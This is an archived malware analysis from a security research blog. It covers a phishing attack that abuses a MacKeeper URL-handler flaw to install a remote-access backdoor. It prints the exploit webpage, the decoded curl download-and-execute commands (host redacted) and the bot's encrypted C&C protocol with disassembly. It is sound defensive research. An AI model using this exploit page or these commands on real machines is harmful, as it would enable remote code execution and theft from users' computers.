{
	"id": "540f9115-a80e-4f1a-8730-3976e0737493",
	"created_at": "2026-04-06T00:10:19.724463Z",
	"updated_at": "2026-04-10T03:20:56.636491Z",
	"deleted_at": null,
	"sha1_hash": "71f4e787e19e4ea6ab27d47d0291f091266be7ce",
	"title": "New Mac OS Malware Exploits MacKeeper",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 128495,
	"plain_text": "New Mac OS Malware Exploits MacKeeper\r\nArchived: 2026-04-05 23:01:03 UTC\r\nWritten by Sergei Shevchenko, Cyber Research\r\nLast month a new advisory was published on a vulnerability discovered in MacKeeper, a controversial software\r\ncreated by Ukrainian company ZeoBIT, now owned by Kromtech Alliance Corp.\r\nAs discovered by Braden Thomas, the flaw in MacKeeper's URL handler implementation allows arbitrary remote\r\ncode execution when a user visits a specially crafted webpage.\r\nThe first reports on this vulnerability suggested that no malicious MacKeeper URLs had been spotted in the wild\r\nyet. Well, not anymore.\r\nSince the proof-of-concept was published, it took just days for the first instances to be seen in the wild.\r\nThe attack this post discusses can be carried out via a phishing email that contains malicious URL.\r\nOnce clicked, the users running MacKeeper will be presented with a dialog that suggests they are infected with\r\nmalware, prompting them for a password to remove this. The actual reason is so that the malware could be\r\nexecuted with the admin rights.\r\nThe webpage hosted by the attackers in this particular case has the following format:\r\n\u003c!doctype html\u003e\r\n\u003chtml\u003e\r\n\u003cbody\u003e\r\n \u003cscript\u003e\r\n window.location.href=\r\n  'com-zeobit-command:///i/ZBAppController/performActionWithHelperTask:\r\n  arguments:/[BASE_64_ENCODED_STUB]';\r\n \u003c/script\u003e\r\n\u003c/body\u003e\r\n\u003c/html\u003e\r\nwhere [BASE_64_ENCODED_STUB] , once decoded, contains the following commands interpreted and executed by\r\nMacKeeper, using system shell:\r\ncurl -A 'Safari' -o /Users/Shared/dufh\r\nhttp://[removed]/123/test/qapucin/bieber/210410/cormac.mcr;\r\nchmod 755 /Users/Shared/dufh;\r\ncd /Users/Shared;\r\n./dufh\r\nhttps://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html\r\nPage 1 of 7\n\nThe launcher path for this command is specified within the [BASE_64_ENCODED_STUB] as \"/bin/sh\" (a symlink\r\nto the currently configured system shell), and the prompt message displayed to the user is:\r\n\"Your computer has malware that needs to be removed\"\r\nAs a result, once the unsuspecting user click the malicious link, the following dialog box will pop up:\r\nOnce the password is specified, the malware will be downloaded, saved as /Users/Shared/dufh , and executed.\r\nAt this stage, the executable file dufh is a dropper. When run, it will dump an embedded executable and then\r\nlaunch it. The dropper will create a plist and update the LaunchAgents in order to enable an auto-start for the\r\ncreated executable (\" \u003ckey\u003eRunAtLoad\u003c/key\u003e \").\r\nBackdoor functionality\r\nThe embedded executable is a bot that allows remote access.\r\nIt can perform the following actions:\r\n    •    Open a pipe stream and execute shell commands\r\n    •    Upload files to the C\u0026C server\r\n    •    Download files from the C\u0026C server\r\n    •    Set execution permissions and run downloaded files\r\nThe bot collects system information such as:\r\n    •    List of all processes and their status\r\n    •    Operating system name and version\r\n    •    User name\r\n    •    Availability of any VPN connections\r\nConfiguration\r\nThe bot keeps its execution parameters in a configuration (config) section. The embedded config parameters are\r\nencoded with a XOR key:\r\nhttps://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html\r\nPage 2 of 7\n\n7D5A25254B12191F7E6415\r\nThe bot parses and distinguishes a number of configuration parameters. Below is the list of the config parameters\r\nalong with their default values:\r\nFILE_NAMEFileName\r\nPATHTOSAVEPathToSave\r\nSHELLShell\r\nSTART_BLOCK_FILE[file]\r\nBLOCK_EXECUTEExecute\r\nBLOCK_DELETEDelete\r\nEND_BLOCK_FILE[/file]\r\nSERVERS[removed]\r\nMACmac\r\nCONFIGconfig\r\nGET_CONFIG1\r\nFILESfile\r\nLOGlog\r\nOLD_CONFIG2\r\nIDid\r\nTOKENh8sn3vq6kl\r\nEXTENSIONS.xml, .pdf, .htm, .zip\r\nThe block of files specified between START_BLOCK_FILE and END_BLOCK_FILE tags will be\r\ndownloaded/executed.\r\nConfig parameters FILES , LOG , ID , CONFIG , OLD_CONFIG , and MAC are used to construct a 'message' that\r\nwill be encrypted and submitted to the server.\r\nFor example, to upload system info in a so-called 'hello' message, the bot will construct a message that looks like:\r\nid=[BOT_ID]\u0026mac=[SYSTEM_INFO]\r\nhttps://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html\r\nPage 3 of 7\n\nTo upload a log file (result from execution of a designated command or a downloaded file), the data uploaded by\r\nthe bot would be wrapped up into the 'message' below:\r\nid=[BOT_ID]\u0026log=[LOG_DATA]\r\nA new config request 'message' would look like:\r\nid=[BOT_ID]\u0026config=1\r\nThe SERVERS parameter contains an updated list of C\u0026C servers.\r\nConfig parameters TOKEN and EXTENSIONS are used to randomise URL parameters, as demonstrated below.\r\nNetwork Communications\r\nThe bot checks if it's connected to the Internet by accessing the Google page: http://www.google.com. If not, it\r\nkeeps checking in a loop until the computer goes online.\r\nThe data transferred over the network is encrypted with a random 4-byte XOR key. The key is generated by\r\nusing Mersenne twister algorithm to produce a high quality random sequence of integers.\r\nThe bot then constructs a blob that consists of 3 parts:\r\n    •    the 4-byte XOR key\r\n    •    a 2-byte CRC16 hash, used for data integrity check\r\n    •    encrypted data\r\nNOTE: The XOR key used to encrypt the data is saved into the blob in an encoded form, using a hard-coded XOR\r\nkey 0x0E150722:\r\n__text:0000000100005684    call   __ZN9Generator13getRandomNumbEmm\r\n__text:0000000100005689    mov    [rbp+random_Number], rax\r\n__text:000000010000568D    mov    rax, [rbp+random_Number]\r\n__text:0000000100005691    xor    rax, 0E150722h\r\n__text:0000000100005697    mov    [rbp+random_Number_xor_0E150722], rax\r\nThe constructed blob is then base64-encoded and passed within the POST request, with a content type\r\n\"application/x-www-form-urlencoded\".\r\nTo decrypt the data returned from the server, it is first base64-decoded, then the key is extracted from the first 4\r\nbytes, decoded with a XOR key  0x0E150722 to obtain the original XOR key. The original key is then used to\r\ndecrypt the data:\r\n__text:00000001000058A9  call  __Znam ; operator new[](ulong)  ; allocate buffer\r\n__text:00000001000058AE  mov   [rbp+decoded_data], rax         ; for decoded data\r\n__text:00000001000058B2  mov   [rbp+index], 0            ; initialise index\r\nhttps://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html\r\nPage 4 of 7\n\n__text:00000001000058BA loop:\r\n__text:00000001000058BA  mov   rax, [rbp+index]\r\n__text:00000001000058BE  cmp   rax, [rbp+size_plus_4]    ; index \u003c size + 4 ?__text:00000001000058C2  jnb  \r\nexit                      ; exit loop if done\r\n__text:00000001000058C8  mov   rax, [rbp+index]          ; RAX = index\r\n__text:00000001000058CC  mov   rcx, [rbp+encrypted_data] ; RCX -\u003e encrypted data\r\n__text:00000001000058D0  movzx edx, byte ptr [rcx+rax+4] ; EDX -\u003e next enc. byte\r\n__text:00000001000058D5  mov   rax, [rbp+index]          ; RAX = index\r\n__text:00000001000058D9  and   rax, 3                    ; from 0 to 3\r\n__text:00000001000058DF  movzx esi, byte ptr [rbp+rax+random_XOR_key]\r\n                                                         ; ESI -\u003e next byte in key\r\n__text:00000001000058E4  xor   edx, esi                  ; XOR next encrypted byte\r\n                                                         ; with next byte in key\r\n__text:00000001000058E6  mov   dil, dl \r\n__text:00000001000058E9  mov   rax, [rbp+index]          ; RAX = index\r\n__text:00000001000058ED  mov   rcx, [rbp+decoded_data]   ; RCX -\u003e decoded data\r\n__text:00000001000058F1  mov   [rcx+rax], dil            ; save decoded byte\r\n__text:00000001000058F5  mov   rax, [rbp+index]          ; RAX = index\r\n__text:00000001000058F9  add   rax, 1                    ; increment index\r\n__text:00000001000058FF  mov   [rbp+index], rax \r\n__text:0000000100005903  jmp   loop                      ; repeat decryption\r\nThe POST requests generated by the bot contain randomised URL parameters. For instance, the generated URLs\r\nmight look like:\r\nhttp://[SERVER_IP]/0OhgAH/qapfAH/YO00Aj/kZvXez/8Sbuoz.pdf/?3Y=x1XjNY1qhVXWJIcNjj4=\r\nhttp://[SERVER_IP]/uPyTA/p4xat/GzmAL/KHkSL/xHkSL.zip/?Ic=7DQFBKYLY2T9RWE8pV8=\r\nhttp://[SERVER_IP]/Rh/EWar/a1br/Pgbr.htm/?li=CBbGU0IpoDMZZ6JrQX0=\r\nhttp://[SERVER_IP]/RkwH0/zkwH0/s0KH0/1TieCO8@%C3%83%C3%98%C2%A5%E2%88%AB%C2%AF%07.xml/?\r\nI=jwj+RcU3mCWeeZp9xmM=\r\nThe random 'extensions' specified within URL string and marked in red, such as .xml , .pdf , .htm , .zip ,\r\nare picked up by the bot from the config parameter EXTENSIONS .\r\nhttps://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html\r\nPage 5 of 7\n\nThe base64-encoded 'request' string, marked in blue, is an encrypted config parameter TOKEN (' h8sn3vq6kl '). It\r\nis encrypted in the same fashion as the data: (random 4-byte XOR key to encode the token, passed encoded with a\r\nfixed XOR key 0x0E150722 ). The only difference is that there is no CRC16 field present in the encoded chunk.\r\nThe other 'path' parts of the URL are random.\r\nThe binary data within the POST request, once base64-decoded, can look in hexadecimal form as:\r\nE7C82476 DAD4 581CF8FF0148F5E95C19A6F27C19A6EF...\r\nAs explained above, the first 4 bytes is the encoded key:  E7C82476 -\u003e   0x7624c8e7 . Once the XOR key\r\n0x0E150722 is applied to it, the original randomly generated XOR key can now be obtained:\r\n0x7624c8e7 ^0x0E150722 =0x7831CFC5 .\r\nNext, the original XOR key ( 0x7831CFC5 ) can be applied (in Big Endian order) to the rest of the data to decrypt\r\nit, resulting in:\r\nE7C82476 1F1B 69643D30303030266D61633D4D616320...\r\nwhere 0x1b1f is the CRC16 hash value, and the decoded data that follows it is a textual form of the collected\r\nsystem information:\r\nid=0000\u0026mac=Mac OS X - Version 10.9\r\nOperation system name - NSMACHOperating\r\nSystem User name - username\r\nUse proxy -\r\n            Process list :\r\nUSER   PID %CPU %MEM   VSZ RSS  TT STAT STARTED  TIME COMMAND\r\nusername 562 1.4 0.1 2471604 3428 s000 S+  6:41PM 0:00.04 ./dufh\r\nusername 529 0.0 0.0 2433344 1164 s000 S   6:38PM 0:00.02 -bash\r\nroot   527 0.0 0.0 2434972 1896 s000 Ss  6:38PM 0:00.03 login -pf username\r\n...\r\nConclusion\r\nIt's quite interesting to see how little time it took the attackers to weaponise a published proof-of-concept exploit\r\ncode.\r\nOne might wonder how the attackers know if the targeted users are running MacKeeper.\r\nIn its press release, MacKeeper claimed that is has surpassed 20 million downloads worldwide.\r\nHence, the attackers might simply be 'spraying' their targets with the phishing emails hoping that some of them\r\nwill have MacKeeper installed, thus allowing the malware to be delivered to their computers and executed.\r\nhttps://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html\r\nPage 6 of 7\n\nSource: https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html\r\nhttps://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html"
	],
	"report_names": [
		"new-mac-os-malware-exploits-mackeeper.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434219,
	"ts_updated_at": 1775791256,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/71f4e787e19e4ea6ab27d47d0291f091266be7ce.pdf",
		"text": "https://archive.orkl.eu/71f4e787e19e4ea6ab27d47d0291f091266be7ce.txt",
		"img": "https://archive.orkl.eu/71f4e787e19e4ea6ab27d47d0291f091266be7ce.jpg"
	}
}